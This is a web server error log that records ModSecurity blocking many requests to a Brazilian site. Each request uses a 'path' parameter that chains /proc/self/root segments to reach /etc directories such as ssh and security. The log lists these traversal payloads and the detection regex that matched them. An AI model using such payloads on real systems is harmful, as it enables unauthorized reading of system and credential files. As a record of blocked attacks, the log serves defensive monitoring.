https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:31.971158 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:58234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrap-w_le52K8_3pV3-7wAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:33.522010 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:58236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraqeoXxyEfFpUF8f-R0AAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:34.837074 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:58248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraqkzinOy1jxa1j4c6VgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:36.099884 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:58260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrarOyqAr6etmhZHNrpIQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:37.417830 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:35074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrarQbLMZ6AikZjR9XhcwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:38.786472 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:35084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrarvu8EFLIOrSqIpsj1AAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:40.171315 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:35096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrasOyqAr6etmhZHNrpKAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:41.479303 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:35106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraseoXxyEfFpUF8f-R1QAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:42.783250 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:35114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrasuoXxyEfFpUF8f-R1gAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:44.187273 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:35118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abratAkwaGbbGflqUZAyvgAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:45.492238 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:35134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abratfu8EFLIOrSqIpsj2wAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:46.095565 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:43148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abratta6ubjKNq_cu4bABgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:02:46.823368 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:35144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abratgkwaGbbGflqUZAywwAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:48.187660 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:34934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrauAkwaGbbGflqUZAyxgAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:49.618970 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:34948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrauew_le52K8_3pV3-_AAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:50.961417 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:34954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrauuyqAr6etmhZHNrpLgAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:52.260538 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:34968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abravPu8EFLIOrSqIpsj4gAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:53.559304 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:34984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abravSmAPhZkrhU8w4mO_AAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:54.904050 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:34986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abravuoXxyEfFpUF8f-R4QAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:55.197964 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:37624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrav8df6f5d65gmYZT2mQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:02:56.257679 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:34994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrawOoXxyEfFpUF8f-R5QAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:02:57.564147 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:48110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] 